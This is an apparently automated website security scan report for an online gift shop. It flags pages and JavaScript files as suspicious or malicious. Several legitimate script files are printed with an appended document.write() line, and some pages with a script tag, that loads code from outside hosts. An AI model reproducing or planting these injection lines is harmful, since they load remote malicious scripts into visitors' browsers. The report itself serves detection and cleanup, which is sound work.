Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=winterberrygifts.com
Result: Google has marked the website as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://winterberrygifts.com/ | 200 OK Content-Length: 9135 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://forsakringsguiderna.se/xnmtlgzf.php?id=36902586"></script> | ||
http://winterberrygifts.com/sg_jscripts/jquery_1.5.2_min.js | 200 OK Content-Length: 86040 Content-Type: application/javascript | clean |
http://winterberrygifts.com/sg_jscripts/jquery.scrollTo-1.4.2-min.js | 200 OK Content-Length: 2369 Content-Type: application/javascript | malicious |
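Malicious code - confirmed by antiviruses (see below). The excerpt appears to be the file's own jQuery.scrollTo code, cut short by the scanner, followed by an appended document.write() call that loads a script from a third-party host. The same trailing statement ends the excerpts of the other three files marked malicious on this page, so the appended line has to be removed from each of them, and the way the files were modified on the server still needs to be found.
;(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:'xy',duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scrollable=function(){return this.map(function(){var a=this,i=!a.nodeName||d.inArray(a.nodeName.toLowerCase(),['iframe','#document','html','body'])!=-1;if(!i)return a;var e=(a.contentWindow||a).document||a.ownerDocument||a;return d.browser.safari||e.compatMode=='BackCompat'?e.body:e.documentElement document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')
Antivirus reports: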
| ||
http://winterberrygifts.com/sg_jscripts/eventlistener.js | 200 OK Content-Length: 764 Content-Type: application/javascript | clean |
http://winterberrygifts.com/winterberry-0-reader-only-for-ebay_menutree_anim.js | 200 OK Content-Length: 906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function init_menutree_anim() { $ml('.menutree_child .menutreetop li').hover( function(){ var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.css('opacity', 0); ul.css('visibility', 'visible'); ul.animate({ opacity: 1 }, 400); } }, function(){ var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.animate({ opacity: 0 }, 400, 'linear', function(){ $ } }); } function init_menutree_anim_ie7() { $ml('.menutree_child .menutreetop li').hover( function() { var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.css('visibility', 'visible'); } }, function() { var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.css('visibility', 'hidden'); };});} document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://winterberrygifts.com/register.php | 200 OK Content-Length: 6953 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://forsakringsguiderna.se/xnmtlgzf.php?id=36902764"></script> | ||
http://winterberrygifts.com/sg_jscripts/misc.js | 200 OK Content-Length: 1004 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function addClass(target, classValue) { var pattern = new RegExp("(^| )" classValue "( |$)"); if(!pattern.test(target.className)) { if(target.className == "") { target.className = classValue; } else { target.className = " " classValue; } } } function removeClass(target, classValue) { var removedClass = target.className; var pattern = new RegExp("(^| )" classValue "( { var len = arr.length; for (var i = 0; i < len; i ) { if(arr[i]===v){return true;} } return false; } function sub_array_contains(arr, v) { var len = arr.length; for (var i = 0; i < len; i ) { if(arr[i][0]===v){return true;} } return false; } document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://winterberrygifts.com/sg_jscripts/form.js | 200 OK Content-Length: 380 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function input_focus(obj) { removeClass(obj, 'hinted'); if(obj.value == obj.alt) { obj.value=''; } } function input_blur(obj) { if((obj.value == obj.alt)||(obj.value == '')) { addClass(obj, 'hinted'); obj.value = obj.alt; } } document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://winterberrygifts.com/index.php | 200 OK Content-Length: 9135 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://forsakringsguiderna.se/xnmtlgzf.php?id=36902586"></script> | ||
http://winterberrygifts.com/contact-us.php | 200 OK Content-Length: 6918 Content-Type: text/html | clean |
http://winterberrygifts.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: winterberrygifts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 15:46:30 GMT
Server: Apache
Content-Length: 9135
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...9135 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: winterberrygifts.com
Referer: http://www.google.com/search?q=winterberrygifts.com
Result:
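The result is similar to the first query. There are no suspicious redirects found. This check covers HTTP-level redirects only: the script tags listed under "Scanned pages/files" are served inside the 200 OK response body, so a clean result here does not mean the page itself is clean.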